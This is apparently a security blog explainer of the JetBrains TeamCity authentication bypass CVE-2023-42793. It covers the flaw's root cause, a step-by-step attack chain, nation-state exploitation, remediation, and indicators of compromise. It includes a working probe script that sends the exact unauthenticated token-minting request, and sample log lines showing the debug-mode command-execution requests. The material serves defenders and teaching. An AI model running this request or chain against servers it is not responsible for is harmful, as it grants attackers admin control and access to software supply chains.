CVE-2023-42793 Explained: JetBrains TeamCity Authentication Bypass (CVSS 9.8)
A pre-authentication remote code execution vulnerability in JetBrains TeamCity CI/CD servers exploited by North Korean and Russian nation-state APTs for software supply chain attacks. No credentials required — one HTTP request generates an admin token.
CVE-2023-42793 is a pre-authentication authentication bypass in JetBrains TeamCity On-Premises, the CI/CD platform thousands of software development organisations use to automate building, testing, and deploying code. Reported to JetBrains in early September 2023 and fixed in TeamCity 2023.05.4 later that month, it carries a CVSS score of 9.8: an unauthenticated attacker can mint an access token for the server's first administrator with a single HTTP request, then use that token for full server compromise, including remote code execution.
The severity compounds beyond the technical vulnerability. TeamCity holds the keys to software supply chains: source code repositories, build secrets, deployment credentials, code signing certificates, and the pipelines that determine what code reaches production. Nation-state threat actors understand this. Russia's APT29 and the North Korean groups Microsoft tracks as Diamond Sleet and Onyx Sleet all exploited CVE-2023-42793 against software vendors, seeking the same kind of access that enabled the SolarWinds supply chain attack.
How CVE-2023-42793 Works: One Request to Admin
TeamCity exposes a REST API for automation and integration. Its request interceptor keeps a short allowlist of paths that may be served before authentication, and one entry on that list was written as a wildcard pattern (any path ending in `/RPC2`) intended for the legacy XML-RPC endpoint. Nothing else about the request is examined before the allowlist check, so any REST route whose URL can be made to end in `/RPC2` becomes reachable without credentials.
The REST route `POST /app/rest/users/<locator>/tokens/<name>` creates a new access token for the named user, and the token name is the last path segment. An unauthenticated `POST /app/rest/users/id:1/tokens/RPC2` therefore matches the allowlist and returns a valid, long-lived access token named `RPC2` for user ID 1, the first account created during setup, which is normally a system administrator. Two details matter for defenders: the request fails if a token named `RPC2` already exists on that user (public exploit code handles this by deleting it first, through the same bypass), and the minted token stays visible in that user's access-token list until someone removes it.
With the admin token, the attacker has complete control of the TeamCity instance. They can create further admin users, upload a malicious TeamCity plugin (which runs inside the server process), run shell commands through build steps, or, as the public exploit chain does, enable the server's REST debug mode by editing `internal.properties` and then spawn processes via `/app/rest/debug/processes`. Everything the server stores is then readable: credentials, source code, and build artifacts.
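The bypass is easier to reason about as code. The following is an added example written for this page, not TeamCity's source: a deliberately small model of a pre-authentication path allowlist (one entry written as the Ant-style wildcard `/**/RPC2`) in front of a REST route whose last segment is caller-chosen. The allowlist contents, the `Server` class and the token format are all assumptions made for illustration; only the shape of the flaw, and the fact that the hardened list matches exactly, is the point.

```python
import re
import secrets
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed model of the bug class, not TeamCity source. It keeps only what
# matters: a pre-authentication allowlist of path patterns, one of them written
# with a wildcard prefix for the legacy XML-RPC endpoint ("/**/RPC2"), and a
# REST route whose final path segment is chosen by the caller (the token name).

def ant_to_regex(pattern: str) -> re.Pattern:
    """Translate an Ant-style path pattern into a regex.
    '/**/' matches zero or more whole segments, '*' matches within one segment."""
    parts, i = [], 0
    while i < len(pattern):
        if pattern.startswith("/**/", i):
            parts.append("/(?:.*/)?")
            i += 4
        elif pattern[i] == "*":
            parts.append("[^/]*")
            i += 1
        else:
            parts.append(re.escape(pattern[i]))
            i += 1
    return re.compile("^" + "".join(parts) + "$")

# Hypothetical allowlists. The wildcard entry is the flaw; the fix is exact matching.
VULNERABLE_PREAUTH = ["/login.html", "/**/RPC2"]
HARDENED_PREAUTH = ["/login.html", "/RPC2"]

TOKEN_ROUTE = re.compile(r"^/app/rest/users/id:(\d+)/tokens/([^/]+)$")

@dataclass
class Token:
    user_id: int
    name: str
    value: str

@dataclass
class Server:
    preauth_patterns: List[str]
    tokens: List[Token] = field(default_factory=list)

    def preauth_allowed(self, path: str) -> bool:
        return any(ant_to_regex(p).match(path) for p in self.preauth_patterns)

    def handle(self, method: str, path: str, authenticated: bool = False) -> Tuple[int, str]:
        """Dispatch in the order that matters: the allowlist is consulted before
        any credential check, so an allowlisted path reaches the token route
        with no identity attached at all."""
        if not authenticated and not self.preauth_allowed(path):
            return 401, "Unauthorized"
        m = TOKEN_ROUTE.match(path)
        if not m:
            return 404, "Not found"
        uid, name = int(m.group(1)), m.group(2)
        existing = [t for t in self.tokens if t.user_id == uid and t.name == name]
        if method == "POST":
            if existing:
                # Documented failure mode: the bypass needs a free name, which is
                # why public exploit code deletes a stale RPC2 token first.
                return 400, f"Token '{name}' already exists"
            tok = Token(uid, name, secrets.token_hex(16))  # assumed token format
            self.tokens.append(tok)
            return 200, f'<token name="{name}" value="{tok.value}"/>'
        if method == "DELETE" and existing:
            self.tokens.remove(existing[0])
            return 204, ""
        return 404, "Not found"

if __name__ == "__main__":
    for label, patterns in (("vulnerable", VULNERABLE_PREAUTH), ("hardened", HARDENED_PREAUTH)):
        srv = Server(patterns)
        print(label, srv.handle("POST", "/app/rest/users/id:1/tokens/RPC2"))
        print(label, srv.handle("POST", "/app/rest/users/id:1/tokens/backup"))
```

Run it and the vulnerable server hands out a token for the `RPC2` name and refuses any other name with 401; the hardened server refuses both, because `/RPC2` now only matches the literal root path. The lesson generalises beyond TeamCity: a pre-auth allowlist expressed as a suffix or wildcard is only as safe as every route that can be made to end in that suffix.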
Identify internet-exposed TeamCity servers
Scan for TeamCity login pages. The login interface is distinctive and readily identifiable, and it shows the server version, which is enough to tell whether a host is below 2023.05.4. Shodan and similar tools indexed thousands of unpatched TeamCity instances after the advisory was published.
Send unauthenticated token generation request
Send an unauthenticated HTTP POST to `/app/rest/users/id:1/tokens/RPC2`. Because the path ends in `/RPC2`, the pre-authentication allowlist passes it through to the token-creation route, and TeamCity answers with a valid admin access token in the response body.
Create backdoor admin account
Use the admin token to create a new administrative user account via the REST API. This gives persistent access independent of the original exploit and survives rotation or deletion of the stolen token.
Upload malicious plugin for code execution
Upload a crafted TeamCity plugin ZIP file containing a malicious Java class. When installed, the plugin executes server-side with the permissions of the TeamCity server process — typically a service account with access to all build secrets and credential stores.
Exfiltrate secrets and implant in build pipelines
Extract all stored credentials (VCS passwords, cloud API keys, signing certificates), exfiltrate source code repositories, and optionally modify build scripts to inject malicious code into future software artifacts for supply chain compromise.
Nation-State Exploitation: APT29 and Lazarus Group Objectives
Two of the most capable nation-state threat actors in the world exploited CVE-2023-42793, with different but equally serious objectives.
Russian APT29 (COZY BEAR, Midnight Blizzard): CISA, the FBI, and NSA issued joint Advisory AA23-347A confirming APT29 exploited CVE-2023-42793 against software developers and IT organisations. APT29's objective was intelligence collection — stealing source code, developer credentials, and proprietary software from targets of strategic interest. APT29 is the group behind the 2020 SolarWinds supply chain attack and has a documented long-term interest in software supply chain access vectors.
North Korean actors (Diamond Sleet and Onyx Sleet): Microsoft confirmed that two North Korean groups exploited CVE-2023-42793 with different aims. Diamond Sleet, which overlaps with the Lazarus Group, used the access to exfiltrate source code and to stage payloads such as the ForestTiger backdoor, consistent with preparation for downstream supply chain attacks. Onyx Sleet, associated with Andariel and better known for revenue-generating operations including ransomware, created a new local user account on compromised hosts and deployed the HazyLoad proxy tool for persistent access.
“The actor has exploited the vulnerability to gain access to multiple TeamCity servers. SVR [Russian Foreign Intelligence Service] cyberactors use a variety of tools and techniques, including this vulnerability, to gain initial access to victim environments.”
— CISA / FBI / NSA Joint Advisory AA23-347A, December 2023
Patching and Fully Remediating CVE-2023-42793
Patching closes the authentication bypass. But if the server was exposed during the exploitation window, comprehensive post-patch remediation is mandatory — treating the server as patched-but-not-investigated is insufficient.
Upgrade to TeamCity 2023.05.4 immediately
The upgrade is the definitive fix. For teams unable to upgrade immediately, JetBrains released a standalone security patch plugin for older versions; the JetBrains Security Advisory lists the supported range and the download. Verify the fix the non-invasive way first: the version shown on the login page and under Administration should read 2023.05.4 or later, or the patch plugin should appear in the installed plugins list. If you probe the endpoint itself, an unauthenticated POST to `/app/rest/users/id:1/tokens/RPC2` must return 401 Unauthorized; remember that on a still-vulnerable server the same probe mints a real admin token, which you then have to revoke.
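The probe described above, and the token request in step 2 of the exploitation chain, are the same HTTP call. Here it is as a verification script, an added example for this page rather than JetBrains or Rapid7 code. The endpoint and the pre-auth POST are the documented ones; the mapping from response to verdict, the XML-or-JSON token regex and the cleanup step are our own assumptions. Only run it against servers you are responsible for: on a vulnerable server it creates an admin token, which the script revokes using that very token.

```python
import re
import sys
import urllib.error
import urllib.request
from typing import Optional, Tuple

# Added example. The path and the pre-auth POST are the ones documented for
# CVE-2023-42793; the verdict mapping and cleanup logic below are assumptions.
TOKEN_PATH = "/app/rest/users/id:1/tokens/RPC2"
TOKEN_VALUE = re.compile(r'(?:value="|"value"\s*:\s*")([^"]+)"')  # XML or JSON body

def classify(status: int, body: str) -> str:
    """Map the result of the unauthenticated POST to a verdict."""
    if status in (401, 403):
        return "patched"                     # auth enforced before the REST layer
    if status == 200 and TOKEN_VALUE.search(body):
        return "vulnerable"                  # a token was issued with no credentials
    if status == 400:
        # The request reached the token route unauthenticated, but a token named
        # RPC2 already exists: the bypass is present and someone may have used it
        # before you did. Treat as vulnerable and already compromised.
        return "vulnerable-token-exists"
    return "inconclusive"

def extract_token(body: str) -> Optional[str]:
    m = TOKEN_VALUE.search(body)
    return m.group(1) if m else None

def _request(base: str, method: str, path: str, headers: Optional[dict] = None) -> Tuple[int, str]:
    req = urllib.request.Request(base.rstrip("/") + path, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")

def probe(base_url: str, cleanup: bool = True) -> str:
    """Send the documented request. On a vulnerable server this CREATES an admin
    token as a side effect; we revoke it at once with the token itself, which
    is why cleanup is on by default."""
    status, body = _request(base_url, "POST", TOKEN_PATH)
    verdict = classify(status, body)
    if verdict == "vulnerable" and cleanup:
        issued = extract_token(body)
        if issued:
            _request(base_url, "DELETE", TOKEN_PATH, {"Authorization": f"Bearer {issued}"})
    return verdict

if __name__ == "__main__":
    print(probe(sys.argv[1]))  # e.g. python probe.py https://teamcity.example.internal
```

Treat any verdict other than `patched` as a finding. The `vulnerable-token-exists` case is the one to escalate first: it means the bypass works and an `RPC2` token was already sitting on user ID 1 before you arrived.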
Audit all admin user accounts
Review all TeamCity administrator accounts (Administration > Users, or the REST API). Remove any account your team does not recognise. The REST API does not expose a user creation date, so use the TeamCity audit log (Administration > Audit) to find accounts created inside your exposure window; any admin created then is a likely backdoor. Pay particular attention to accounts with generic or plausible-looking names, and list the access tokens on every admin account as well: a token named `RPC2` on user ID 1 is the direct fingerprint of this exploit.
Rotate all credentials stored in TeamCity
TeamCity stores VCS credentials (Git tokens, SVN passwords), cloud provider API keys, SSH keys, deployment credentials, and code signing certificate stores. Rotate every stored credential. Assume all were exfiltrated if the server was running vulnerable software in an internet-exposed state.
Review build history for tampering
Examine recent build logs, build configurations, and artifact histories for unexpected modifications. Look for added build steps, modified scripts, and unusual artifact outputs. Nation-state actors targeting supply chains specifically modify build pipelines, so the evidence will be in build configuration changes. If versioned settings are enabled, every configuration change is also a commit in the settings repository, which is the easiest place to diff.
Restrict TeamCity to internal network access
TeamCity should not be internet-accessible unless required by your architecture. Place TeamCity behind a VPN or in an internal network segment with firewall rules blocking external access. The vast majority of exploit attempts used internet-facing TeamCity servers as entry points.
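The account and token audit from the remediation steps above can be scripted against the REST API. This is an added example for this page, not JetBrains tooling; the JSON shapes it expects (`user`, `roles.role[].roleId`, `token[].name`, `token[].creationTime`) follow the TeamCity REST API with `Accept: application/json` as we understand it and should be treated as assumptions, as should the `SYSTEM_ADMIN` role id, the timestamp format and the exposure-start date. The sample payloads are constructed. Use a legitimate admin token for the live call, never one obtained through the bypass.

```python
import json
import urllib.request
from datetime import datetime, timezone
from typing import Dict, List, Optional

# Added example. Response shapes follow the TeamCity REST API with
# Accept: application/json as we understand it (an assumption, not verified
# here); the payloads at the bottom are constructed to exercise the checks.

ADMIN_ROLE = "SYSTEM_ADMIN"   # assumed role id for the global administrator role

def parse_tc_time(value: str) -> Optional[datetime]:
    """TeamCity timestamps look like 20230928T031204+0000 (assumed format)."""
    try:
        return datetime.strptime(value, "%Y%m%dT%H%M%S%z")
    except ValueError:
        return None

def admin_usernames(users: Dict) -> List[str]:
    """users: GET /app/rest/users?fields=user(id,username,roles(role(roleId,scope)))"""
    return [u["username"] for u in users.get("user", [])
            if any(r.get("roleId") == ADMIN_ROLE for r in u.get("roles", {}).get("role", []))]

def suspicious_tokens(tokens: Dict, exposure_start: datetime) -> List[Dict]:
    """tokens: GET /app/rest/users/id:N/tokens. Flags the name the bypass forces
    (RPC2) and anything minted inside the exposure window."""
    flagged = []
    for t in tokens.get("token", []):
        reasons = []
        if t.get("name") == "RPC2":
            reasons.append("name forced by CVE-2023-42793 bypass")
        created = parse_tc_time(t.get("creationTime", ""))
        if created and created >= exposure_start:
            reasons.append("created inside exposure window")
        if reasons:
            flagged.append({"name": t.get("name"), "reasons": reasons})
    return flagged

def audit(users: Dict, tokens_by_user: Dict[int, Dict],
          exposure_start: datetime, known_admins: List[str]) -> Dict:
    """Pure function, so it runs against saved API output or the samples below."""
    admins = admin_usernames(users)
    report = {"unknown_admins": sorted(set(admins) - set(known_admins)), "flagged_tokens": {}}
    for u in users.get("user", []):
        if u["username"] in admins:
            hits = suspicious_tokens(tokens_by_user.get(u["id"], {}), exposure_start)
            if hits:
                report["flagged_tokens"][u["username"]] = hits
    return report

def fetch_and_audit(base: str, api_token: str, exposure_start: datetime, known_admins: List[str]) -> Dict:
    """Live variant: needs a legitimate admin token, not one from the bypass."""
    def get(path: str) -> Dict:
        req = urllib.request.Request(base.rstrip("/") + path,
                                     headers={"Authorization": f"Bearer {api_token}",
                                              "Accept": "application/json"})
        with urllib.request.urlopen(req, timeout=15) as resp:
            return json.load(resp)
    users = get("/app/rest/users?fields=user(id,username,roles(role(roleId,scope)))")
    tokens = {u["id"]: get(f"/app/rest/users/id:{u['id']}/tokens") for u in users.get("user", [])}
    return audit(users, tokens, exposure_start, known_admins)

# Constructed sample data: one legitimate admin carrying an RPC2 token minted in
# late September 2023, one unknown admin, one ordinary developer account.
SAMPLE_USERS = {"count": 3, "user": [
    {"id": 1, "username": "admin", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}},
    {"id": 2, "username": "build-bot", "roles": {"role": [{"roleId": "PROJECT_DEVELOPER", "scope": "p:_Root"}]}},
    {"id": 7, "username": "svc_monitor", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}},
]}
SAMPLE_TOKENS = {
    1: {"count": 2, "token": [{"name": "ci-deploy", "creationTime": "20230115T101500+0000"},
                              {"name": "RPC2", "creationTime": "20230928T031204+0000"}]},
    7: {"count": 0, "token": []},
}
EXPOSURE_START = datetime(2023, 9, 18, tzinfo=timezone.utc)  # assumed: day the fixed build shipped

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_USERS, SAMPLE_TOKENS, EXPOSURE_START, ["admin"]), indent=2))
```

Against the sample data the report names `svc_monitor` as an unknown administrator and flags the `RPC2` token on `admin` for both reasons. Run the live variant before you rotate anything, so the evidence is captured, then revoke the flagged tokens and disable the unknown accounts.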
Indicators of Compromise for CVE-2023-42793
Look for the following in TeamCity logs and on the server filesystem once you have established that the server was vulnerable and internet-exposed.
| Artifact | Where to look | What it indicates |
|---|---|---|
| Unrecognised administrator user accounts | Administration > Users, or `GET /app/rest/users` | Backdoor account created with the stolen token |
| Access token named `RPC2` on the first admin user (ID 1) | Administration > Users > (user) > Access Tokens, or `GET /app/rest/users/id:1/tokens` | Direct fingerprint of the exploit; the bypass forces this token name |
| Requests to `/app/rest/users/id:1/tokens/RPC2` (or any REST path ending in `/RPC2`) without prior authentication | TeamCity server logs, reverse proxy and Tomcat access logs | The bypass request itself; it precedes all further activity |
| `rest.debug.processes.enable=true` in `<data directory>/config/internal.properties`, and requests to `/app/rest/debug/processes` | Filesystem, access logs | Debug mode enabled to spawn processes, the command execution path observed in the wild |
| Unexpected plugin ZIP files in `<data directory>/plugins/` | TeamCity filesystem | Malicious plugin installed for code execution inside the server process |
| ForestTiger backdoor, FeedLoad loader, HazyLoad proxy tool | Process and filesystem artifacts on the host | Post-exploitation tooling Microsoft documented for Diamond Sleet and Onyx Sleet |
A DLL carrying a Windows system-library name, such as msimg32.dll, found anywhere outside C:\Windows\System32 is a DLL search-order hijacking indicator of the kind Microsoft described in Diamond Sleet's second attack path; isolate the host and triage it. Full hashes and IOC lists are in the Microsoft Threat Intelligence report and in CISA advisory AA23-347A, both listed under Sources.
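The request-based indicators in the table can be swept out of access logs mechanically. The following is an added example for this page, not a vendor detection rule: it assumes combined-format access logs from a reverse proxy or Tomcat's access-log valve in front of TeamCity, matches the three request paths tied to the documented chain (the bypass, the `internal.properties` edit that enables debug mode, and `/app/rest/debug/processes`), and grades each client by which of them it hit. The log lines are constructed; the rule names and verdict strings are our own.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Added example. Assumes combined-format access logs from a reverse proxy or
# Tomcat's access-log valve; the sample lines below are constructed.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Request paths tied to the documented exploitation chain. The first is the
# bypass itself; the other two are the post-exploitation steps reported for
# the public exploit (enable REST debug mode, then spawn processes).
RULES = [
    ("token-bypass",        re.compile(r"^/app/rest/.+/RPC2(?:\?|$)")),
    ("internal-props-edit", re.compile(r"^/admin/dataDir\.html\?.*fileName=config/internal\.properties")),
    ("debug-process-exec",  re.compile(r"^/app/rest/debug/processes")),
]

def scan(lines: List[str]) -> List[Dict]:
    """Return one finding per log line that matches a rule (first rule wins)."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m:
            continue  # not combined format, or a malformed line; skip rather than guess
        for rule, pat in RULES:
            if pat.search(m["target"]):
                findings.append({"line": n, "rule": rule, "client": m["client"],
                                 "method": m["method"], "status": int(m["status"]), "ts": m["ts"]})
                break
    return findings

def triage(findings: List[Dict]) -> Dict[str, str]:
    """A client that hit the bypass and then a process-execution path is a
    confirmed chain; a successful bypass hit alone still means a token was minted."""
    by_client = defaultdict(set)
    for f in findings:
        if f["status"] < 400:          # only requests the server accepted count
            by_client[f["client"]].add(f["rule"])
    verdicts = {}
    for client, rules in by_client.items():
        if "token-bypass" in rules and "debug-process-exec" in rules:
            verdicts[client] = "compromised: token minted and commands executed"
        elif "token-bypass" in rules:
            verdicts[client] = "compromised: admin token minted"
        else:
            verdicts[client] = "suspicious: review with authenticated-user context"
    return verdicts

# Constructed sample: one attacker running the full chain, one legitimate API
# user, and one request to the real root XML-RPC path that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.42 - - [27/Sep/2023:03:12:04 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 312 "-" "python-requests/2.31.0"',
    '203.0.113.42 - - [27/Sep/2023:03:12:09 +0000] "POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable%3Dtrue HTTP/1.1" 200 0 "-" "python-requests/2.31.0"',
    '203.0.113.42 - - [27/Sep/2023:03:12:15 +0000] "POST /app/rest/debug/processes?exePath=cmd.exe&params=/c%20whoami HTTP/1.1" 200 57 "-" "python-requests/2.31.0"',
    '198.51.100.7 - alice [27/Sep/2023:08:30:01 +0000] "GET /app/rest/builds?locator=count:10 HTTP/1.1" 200 8192 "-" "curl/8.1.2"',
    '198.51.100.7 - - [27/Sep/2023:08:31:44 +0000] "POST /RPC2 HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
    print(triage(scan(SAMPLE_LOG)))
```

The access log cannot tell you whether a request carried credentials, so the bypass rule keys on the forced `/RPC2` suffix under `/app/rest/` rather than on authentication state; legitimate traffic to the root `/RPC2` path is deliberately left alone. Pair the hits with `teamcity-auth.log` and the token list from the audit step to confirm.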
The bottom line
CVE-2023-42793 is a vulnerability that carries consequences well beyond the compromised TeamCity server itself. Software supply chains are among the highest-value targets in modern threat intelligence operations — the SolarWinds incident proved that compromising a CI/CD platform can result in thousands of downstream victims who receive malicious software through a trusted update mechanism. APT29 and Lazarus Group understood this when they prioritised CVE-2023-42793 exploitation.
If your organisation runs on-premises TeamCity and did not patch before nation-state actors began exploiting this vulnerability in September 2023, the remediation is not simply applying the patch. It requires treating the server as compromised, rotating every credential it held, auditing every build configuration it managed, and reviewing every artifact it produced during the potential compromise window. The software your TeamCity server built may need to be reviewed too.
Frequently asked questions
What is CVE-2023-42793?
CVE-2023-42793 is a CVSS 9.8 authentication bypass in JetBrains TeamCity on-premises servers. An unauthenticated attacker sends a crafted HTTP request to a specific TeamCity REST API endpoint, generating a valid admin authentication token without any credentials. The token can then be used to execute arbitrary code via TeamCity's plugin upload or script execution features.
Which versions of TeamCity are affected?
All on-premises JetBrains TeamCity versions prior to 2023.05.4 are affected. TeamCity Cloud is not affected — it was patched before the public disclosure. If you are running any on-premises TeamCity server below 2023.05.4, you should treat it as compromised until you have patched and investigated.
Why is CVE-2023-42793 dangerous for software supply chains?
TeamCity manages the build, test, and deployment pipelines for software. A compromised TeamCity server gives an attacker control over build processes — allowing them to inject malicious code into compiled artifacts, modify deployment scripts, exfiltrate source code and build secrets, steal code signing certificates, and tamper with packages before they reach end users or production. This is precisely the access needed for a SolarWinds-style supply chain attack.
Was CVE-2023-42793 exploited in the wild?
Yes, extensively. CISA, FBI, and NSA issued a joint advisory confirming that Russian APT29 (COZY BEAR) exploited CVE-2023-42793 to compromise TeamCity servers at organisations in the US and allied nations for intelligence collection. Microsoft confirmed that North Korean groups Diamond Sleet (Lazarus-linked) and Onyx Sleet also exploited the vulnerability, with objectives including source code theft, supply chain compromise, and ransomware deployment.
How do I fix CVE-2023-42793?
Upgrade to TeamCity 2023.05.4 or later. If you cannot immediately upgrade, JetBrains released a standalone security patch plugin that can be applied to older versions without a full upgrade; the JetBrains Security Advisory lists the supported range. After patching, audit all admin user accounts, revoke any access token named RPC2 and reset the rest, rotate all secrets stored in TeamCity (VCS credentials, deployment keys, certificate stores), and review build history for unauthorized modifications.
Sources & references
- NVD
- JetBrains Security Advisory
- CISA / FBI / NSA Advisory AA23-347A — Russian APT29 Targets JetBrains TeamCity Servers
- Microsoft Threat Intelligence — Diamond Sleet and Onyx Sleet Exploit CVE-2023-42793
- Rapid7 Attack Analysis

Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.
